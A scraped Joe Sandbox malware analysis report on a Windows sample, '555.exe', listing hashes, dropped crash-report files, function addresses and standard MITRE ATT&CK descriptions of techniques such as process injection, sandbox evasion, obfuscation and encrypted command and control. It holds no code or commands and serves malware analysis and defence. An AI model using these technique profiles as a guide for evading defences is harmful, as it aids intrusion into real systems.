Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: CG
API String ID: 4063778783-3621608553
Opcode ID: 28805badec2f3eed94baa6b7095dc050fe0b737bd98eb2f7d3b41c6913fa689e
Instruction ID: ad8e9210ed0746555e4d241939b84e8984754778d3880eb7d1ce4a97757e1391
Opcode Fuzzy Hash: 28805badec2f3eed94baa6b7095dc050fe0b737bd98eb2f7d3b41c6913fa689e
Instruction Fuzzy Hash: 39E06530900208AACF10FEB1D8816CE77A89B0439AF10C17BF919E51D1DB789748CF99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 555.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_555.exe_73a2317c9b18c06fb4572ea77cd525ee3f28dbd_69550887_1ab655c1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D28.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER497D.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E21.tmp.xml

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Windows Analysis Report
555.exe

Function 00408B20 Relevance: 245.0, APIs: 122, Strings: 17, Instructions: 1736
filestringCOMMONCrypto

Function 0040AC10 Relevance: 93.4, APIs: 47, Strings: 6, Instructions: 687
windowCOMMONCrypto

Function 0040D360 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 235
windowregistryCOMMON

Function 00407DF0 Relevance: 18.3, APIs: 1, Strings: 9, Instructions: 824
COMMONCrypto

Function 00408870 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 200
COMMON

Function 0040CE10 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 397
windowfileCOMMON

Function 00414C60 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 469
COMMON

Function 00422C34 Relevance: 6.0, APIs: 4, Instructions: 41
COMMONLIBRARYCODE

Function 0041C060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Function 00424555 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 0040EF20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Function 0041C130 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Function 0040A33A Relevance: 3.0, APIs: 2, Instructions: 31
encryptionwindowCOMMON

Function 0043BA46 Relevance: 3.0, APIs: 2, Instructions: 21
COMMONLIBRARYCODE

Function 0042B55C Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Function 0040A2A8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Function 0044C8ED Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE